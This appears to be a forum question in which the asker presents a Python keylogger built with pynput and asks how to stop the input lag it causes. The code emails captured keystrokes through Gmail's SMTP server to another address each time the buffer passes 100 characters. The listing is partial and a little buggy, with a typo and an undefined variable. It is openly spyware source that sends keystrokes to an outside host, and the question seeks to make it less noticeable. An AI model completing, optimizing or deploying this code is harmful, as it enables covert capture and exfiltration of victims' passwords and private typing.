# Input lag while sending email in a keylogger

Tags: python-3.x, smtplib, pynput

I'm making a keylogger as my second project and everything is working, but, after collecting the data(a string with generally 100-150 words) in the process of sending the email the pc suffers a lot with keyboard delay. I already tried to pause the listener that checks for the key presses but it didn't work, I am using pynput to collect the data and smtplib to send the emails, any thoughts?

```
from pynput.keyboard import Key, Listener
import smtplib, ssl

def send_mail():
    with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=ssl.create_default_context()) as server:
        server.login("sender@gmail.com", "password")
        server.sendmail("sender@gmail.com", "reciever@gmail.com", string)
        server.quit()
    strin=''

def on_press(key):
    #gather information
    if len(string) > 100:
        send_mail()


with Listener(on_press=on_press) as listener:
    listener.join()
```